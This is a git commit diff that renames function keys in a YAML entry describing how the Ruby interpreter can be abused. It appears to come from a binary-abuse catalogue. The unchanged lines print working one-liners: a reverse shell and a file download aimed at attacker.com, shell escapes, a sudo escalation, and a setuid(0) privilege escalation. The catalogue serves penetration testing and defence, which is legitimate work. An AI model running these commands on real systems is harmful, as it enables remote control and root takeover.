Adopt new function names

This commit is contained in:
Emilio Pinna
2018-10-05 18:55:38 +01:00
parent 1c77f099d3
commit dd337b5ddf
110 changed files with 354 additions and 354 deletions

View File

@@ -1,19 +1,19 @@
---
functions:
execute-interactive:
shell:
- code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload:
file-upload:
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
@@ -25,10 +25,10 @@ functions:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
file-read:
- code: ruby -e 'puts File.read("file_to_read")'
load-library:
library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled:
sudo:
- code: sudo ruby -e 'exec "/bin/sh"'
capabilities-enabled:
capabilities:
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
---